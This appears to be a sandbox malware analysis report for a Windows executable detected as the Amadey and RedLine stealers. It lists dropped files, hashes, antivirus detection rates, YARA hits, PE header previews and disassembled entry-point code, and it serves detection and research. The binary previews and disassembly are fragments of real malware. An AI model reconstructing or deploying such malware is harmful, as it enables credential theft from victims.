                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe9Ih54BvUwE.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                FACVtLdvUY.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                  aAD8mhS5Ek.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe
                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):226
                                                                                                                                                                                                    Entropy (8bit):5.354940450065058
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                    MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2843
                                                                                                                                                                                                    Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:MIHK5HKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1N:Pq5qXeqm00YqhQnouOqLqdqNq2qzcGtD
                                                                                                                                                                                                    MD5:DAF9A52B107236300FA41B38853735C8
                                                                                                                                                                                                    SHA1:43EF9F0EB0D9892B7CD8666E8AB2DD66E16ED6A7
                                                                                                                                                                                                    SHA-256:7CF83296761CD0CD127604D5BA83CB7EBCCF29C2B1964AFD8867CE28A5834636
                                                                                                                                                                                                    SHA-512:9954EF9BB1EEB1805DDF2FCE219A7678031B71AAFF29F05A3EE210F01C0C4B484194C43584366D6FD287F69A54B876AD1C110CF5F244EE21CA5ADD8C5957164A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Cultu
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\y0EWt2mE9h.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):245414
                                                                                                                                                                                                    Entropy (8bit):6.361027832663395
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:U6f3mSV2p10caphMnboArJMuVyhpLT7oC2y8nU:UTb0caE0A2uVybLT7oChd
                                                                                                                                                                                                    MD5:793589EA3A4AFA871CAB7455576A4610
                                                                                                                                                                                                    SHA1:69EFBEC0FEBFA4580F70AA3F47A1D98C10D5D37E
                                                                                                                                                                                                    SHA-256:E3E3165A44A938B18E994C319A2D7955816D3352B41B95EB33C8EEBD7291881C
                                                                                                                                                                                                    SHA-512:6A078944BDBE83F25D61F0A5A55C41493493E57553EC9003EE6FD285488A7BE7C0A2B00D6A14B863F6DC0BDC0AB0815E7EFCE2098CD88B339AD30AF4DF82B32B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 72%
                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 70%, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z....D...D...D...E...D...EG..D...E...D2..E...D2..E...D2..E...D...E...D...DE..D|..E...D|..D...D|..E...DRich...D........PE..L...+..c.............................v............@.......................... ............@.................................H...d...............................h(...S..p....................T.......S..@............................................text............................... ..`.rdata..............................@..@.data...pG...........z..............@....rsrc...............................@..@.reloc..h(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\y0EWt2mE9h.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):929792
                                                                                                                                                                                                    Entropy (8bit):7.9142524491964945
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:hyxX5INRPSyRvzjMCJJEEzLjUaKKdv9wVlep8W:UxAPVv/MCLvFdiVlea
                                                                                                                                                                                                    MD5:1D818CDC54AEBE2E587F77D717B0D1C0
                                                                                                                                                                                                    SHA1:1110F3310CADF95C55FC4ED07077B26DF3706887
                                                                                                                                                                                                    SHA-256:2E79C4B3F0149D247D4497BE07B33993ED729D1B9F611F4668ED014C7DF4B0A8
                                                                                                                                                                                                    SHA-512:0939F45FD4F1C38476CA39BE341C0D38BF98BA63A4FA1A3234AE6F2ADFD51F8AAAACF15EDDDDF4ACD1653FC0C9AE35902360A81E1213387EBC4917F6F4B213FA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 56%
                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 46%, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................ON....@...... ...........................................................p..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......p.......&..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):351744
                                                                                                                                                                                                    Entropy (8bit):7.051104239997113
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:iTUALK3rF65KLXfEeznTDxvMEVPOEY47n5mIZ/ysa:iT3ubF654dznTDxkZEY4jhUs
                                                                                                                                                                                                    MD5:3C88EF8689CBDA12A3A7C5D586E5FA04
                                                                                                                                                                                                    SHA1:E9CD6467705015FD99F90195D406EB324F56C1B5
                                                                                                                                                                                                    SHA-256:5E952D469BEF765647688D773A962727577618618B9C121AD86EF64D3BC2860E
                                                                                                                                                                                                    SHA-512:089BE7BC8FF72155A9A391D4FF9ACF4267194D3A8C730CF5A295DE45FED7DBF1BAE525A9D4DB383AC6361745BE74EBC134CFE6AC686FDE1766123A0A1DB61C07
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 46%, Browse
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: 9Ih54BvUwE.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: FACVtLdvUY.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: aAD8mhS5Ek.exe, Detection: malicious, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t....{[..{[..{[.G.[..{[.G.[..{[.G.[..{[...[..{[..z[A.{[.G.[..{[.G.[..{[.G.[..{[Rich..{[........................PE..L.....b................. ....y.....(P.......0....@...........................{......:......................................D%..d.....y.8.....................z......................................2..@............................................text...t........ .................. ..`.data....Px..0.......$..............@....tizivod......y......&..............@..@.rotuv..F.....y......*..............@..@.vuj..........y......D..............@..@.vuwoy........y......H..............@....rsrc...8.....y......L..............@..@.reloc..Ti....z..j..................@..B................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):699904
                                                                                                                                                                                                    Entropy (8bit):7.870556102288291
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:IMr4y90271eaQeUyBTo8vgijsMMzmiqY4qh+zoytDvUpKKdvlPlu:AyjBeatZvlYMn1J8+zFvUpKKdvVo
                                                                                                                                                                                                    MD5:611B6D7CD33B7C08EFA3757F4080FF78
                                                                                                                                                                                                    SHA1:D52D5A366231470DDDE3403D772E9F158E1A5060
                                                                                                                                                                                                    SHA-256:BEAAB8500DB0D508D314505C33307E40ACAB559BC625C4B7E2F6102FC11D81D7
                                                                                                                                                                                                    SHA-512:967E9B25F8D14A6B90B47F7538865862C4E7DAB9FF9F900AA39881FC87DF2485E4C80F0AB3DA662B6BA73F77A1D676383F7AF2ECD49BFA8F5AA7BDBAB6EE6F7A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 41%, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...F......`j............@.................................np....@...... ......................................P&..............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....0.......(...|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):292352
                                                                                                                                                                                                    Entropy (8bit):6.768424467340251
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:LIJiLB3qs59NcKFXN7+CTcux9dFS3QJFXXr0aZraa:LIQ16s5vcKFB+QDS3QzXZO
                                                                                                                                                                                                    MD5:651C8DE2C842222F48C74FB0715F3C6F
                                                                                                                                                                                                    SHA1:E44A7175B5764C0725BDF56D323B1DEF32DE7B4E
                                                                                                                                                                                                    SHA-256:C94C4C986988C2D336AAC0DDCE64BDE2EB6D4C00FCFD5DFA63F639E8977FA0F9
                                                                                                                                                                                                    SHA-512:5098233D1F25B37EFCD5F433C9D157F9E49B3139BC9125100244EF68EB0E7DDCFE2B5B38B09D07B940D516142A86C54FB99701B6F60B0816C9A98703C53D1820
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 48%, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t....{[..{[..{[.G.[..{[.G.[..{[.G.[..{[...[..{[..z[A.{[.G.[..{[.G.[..{[.G.[..{[Rich..{[........................PE..L...<Y.b................. ....x.....(P.......0....@...........................z.....~.......................................D%..d.....x.8.....................y......................................2..@............................................text...t........ .................. ..`.data...hhw..0.......$..............@....zar..........x......>..............@..@.dat....F.....x......B..............@..@.zire.........x......\..............@..@.zimikuy......x......`..............@....rsrc...8.....x......d..............@..@.reloc..Ti....y..j..................@..B................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):409088
                                                                                                                                                                                                    Entropy (8bit):7.715633020574459
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:Ksy+bnr+Qp0yN90QEiVI5S2DDc+7RXqfyERCNMvvFEV/zEY47g5mIZIsi:0MrAy90k2D/lTsMMvdmEY4khji
                                                                                                                                                                                                    MD5:830F4723EC8EAD8F959AF2AC394E2E8F
                                                                                                                                                                                                    SHA1:0956323E9BA67824F36508E71DF3F64ED15D7062
                                                                                                                                                                                                    SHA-256:9D67FE0A2298EF64881F66D93C303F5D4D5ED871BFB1031DD9742847B27C8A54
                                                                                                                                                                                                    SHA-512:C21D67A36DCEB6FE3DB90BF3206AC78FCC501E02951624467E3A368372A567CC15889533F8E9375DAE5CBF3474CB1D752C9AF2B6E63C380F313DFF63C607F61A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@......................................@...... ......................................`...............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............4..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):11616
                                                                                                                                                                                                    Entropy (8bit):4.86144612114815
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                    MD5:19C22162FD676451E1967474A4076E6F
                                                                                                                                                                                                    SHA1:87D8FB1EB1B75C81977DBD83A6CF860E93379387
                                                                                                                                                                                                    SHA-256:00279D7287A94179B005376B0D03F5E6EE190F259A8F48954BBB20CED05C3F9C
                                                                                                                                                                                                    SHA-512:F305788720BC0CA21FFA431E5041A33ED45AECFEE712AF6276BEB316028592AFAF4C085CBCE963E43544937454E5F65627413B12DD726311C77070F2CC4CB1D4
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 56%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):351744
                                                                                                                                                                                                    Entropy (8bit):7.051104239997113
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:iTUALK3rF65KLXfEeznTDxvMEVPOEY47n5mIZ/ysa:iT3ubF654dznTDxkZEY4jhUs
                                                                                                                                                                                                    MD5:3C88EF8689CBDA12A3A7C5D586E5FA04
                                                                                                                                                                                                    SHA1:E9CD6467705015FD99F90195D406EB324F56C1B5
                                                                                                                                                                                                    SHA-256:5E952D469BEF765647688D773A962727577618618B9C121AD86EF64D3BC2860E
                                                                                                                                                                                                    SHA-512:089BE7BC8FF72155A9A391D4FF9ACF4267194D3A8C730CF5A295DE45FED7DBF1BAE525A9D4DB383AC6361745BE74EBC134CFE6AC686FDE1766123A0A1DB61C07
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t....{[..{[..{[.G.[..{[.G.[..{[.G.[..{[...[..{[..z[A.{[.G.[..{[.G.[..{[.G.[..{[Rich..{[........................PE..L.....b................. ....y.....(P.......0....@...........................{......:......................................D%..d.....y.8.....................z......................................2..@............................................text...t........ .................. ..`.data....Px..0.......$..............@....tizivod......y......&..............@..@.rotuv..F.....y......*..............@..@.vuj..........y......D..............@..@.vuwoy........y......H..............@....rsrc...8.....y......L..............@..@.reloc..Ti....z..j..................@..B................................................................................................................................................................................................
                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):7.935053784481532
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                    File name:y0EWt2mE9h.exe
                                                                                                                                                                                                    File size:1116672
                                                                                                                                                                                                    MD5:0588e4e46299165692a58b2046b3ea12
                                                                                                                                                                                                    SHA1:642675b7bf9a5897ad906bc1b5f820250ec1b41d
                                                                                                                                                                                                    SHA256:f45dd70543ccbc73be3743bac6f7e35179e5192bdd121504d129b74d1ae74996
                                                                                                                                                                                                    SHA512:c29ad42e8330406805111525894df61db0bbe9cb67a98a19aab05eedccc00c05cfd588e7153873831f98a7fe908942dcaa19500cd94f735a4e1c5be8a12fca72
                                                                                                                                                                                                    SSDEEP:24576:OybxVhr/k1bBvmgMhSjJmz4jUxK1dvZ+SbuZScZZ:dbxHk1bBvRMEmG/dESCF
                                                                                                                                                                                                    TLSH:4C352317A5EDD022E9B8177459F603C31A35FE916A3C4396A34EAEA91C330F4933635B
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                                                                                                                                                    Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                    Entrypoint:0x406a60
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                    Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:10
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:10
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:10
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    call 00007F4F68706895h
                                                                                                                                                                                                    jmp 00007F4F687061A5h
                                                                                                                                                                                                    push 00000058h
                                                                                                                                                                                                    push 004072B8h
                                                                                                                                                                                                    call 00007F4F68706937h
                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                    mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                    lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                    push eax
                                                                                                                                                                                                    call dword ptr [0040A184h]
                                                                                                                                                                                                    mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                    mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                    mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                    mov edi, ebx
                                                                                                                                                                                                    mov edx, 004088ACh
                                                                                                                                                                                                    mov ecx, esi
                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                    lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    je 00007F4F687061BAh
                                                                                                                                                                                                    cmp eax, esi
                                                                                                                                                                                                    jne 00007F4F687061A9h
                                                                                                                                                                                                    xor esi, esi
                                                                                                                                                                                                    inc esi
                                                                                                                                                                                                    mov edi, esi
                                                                                                                                                                                                    jmp 00007F4F687061B2h
                                                                                                                                                                                                    push 000003E8h
                                                                                                                                                                                                    call dword ptr [0040A188h]
                                                                                                                                                                                                    jmp 00007F4F68706179h
                                                                                                                                                                                                    xor esi, esi
                                                                                                                                                                                                    inc esi
                                                                                                                                                                                                    cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                    jne 00007F4F687061ACh
                                                                                                                                                                                                    push 0000001Fh
                                                                                                                                                                                                    call 00007F4F687066CBh
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    jmp 00007F4F687061DCh
                                                                                                                                                                                                    cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                    jne 00007F4F687061CEh
                                                                                                                                                                                                    mov dword ptr [004088B0h], esi
                                                                                                                                                                                                    push 004010C4h
                                                                                                                                                                                                    push 004010B8h
                                                                                                                                                                                                    call 00007F4F687062F6h
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    je 00007F4F687061B9h
                                                                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                    mov eax, 000000FFh
                                                                                                                                                                                                    jmp 00007F4F687062D9h
                                                                                                                                                                                                    mov dword ptr [004081E4h], esi
                                                                                                                                                                                                    cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                    jne 00007F4F687061BDh
                                                                                                                                                                                                    push 004010B4h
                                                                                                                                                                                                    push 004010ACh
                                                                                                                                                                                                    call 00007F4F68706885h
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    mov dword ptr [000088B0h], 00000000h
                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x108364.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1150000x888.reloc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                    .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                    .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rsrc0xc0000x1090000x108400False0.9648871733088931data7.952919655905017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .reloc0x1150000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                    AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                    RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                                                                                                                                                    RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                    RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                                                                                                                                                    RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                                                                                                                                                    RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                                                                                                                                                    RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                                                                                                                                                    RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                                                                                                                                                    RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                                                                                                                                                    RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                    RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                                                                                                                                                    RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                                                                                                                                                    RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                                                                                                                                                    RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
